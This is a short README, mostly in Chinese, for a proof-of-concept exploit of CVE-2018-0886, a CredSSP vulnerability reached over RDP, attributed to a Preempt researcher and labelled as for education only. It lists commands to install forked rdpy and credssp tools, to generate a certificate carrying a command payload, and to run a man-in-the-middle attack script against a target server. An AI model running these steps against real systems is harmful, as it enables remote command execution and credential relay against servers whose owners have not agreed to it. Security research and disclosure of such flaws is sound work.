
A code demonstrating CVE-2018-0886
这是一个用于利用CVE-2018-0886的概念验证代码。仅用于教育目的。 它依赖于rdpy项目的一个分支(https://github.com/preempt/rdpy),同时也支持credssp中继。
由Eyal Karni编写,Preempt公司 [email protected]
如果您使用的是Ubuntu 14,请检查安装文件。 已在Ubuntu 16.04上测试。
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
从任何域导出适用于服务器身份验证的证书。 (用于RDP https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn781533(v=ws.11))
要生成利用该漏洞(包含有效载荷)的证书,请使用:
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD
(ExportedCert是步骤1中导出的证书。exploitc.pem和exploitk.pem分别是生成的证书和私钥。)
要运行攻击脚本:
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer
更多详情请参见脚本的使用说明(--help)。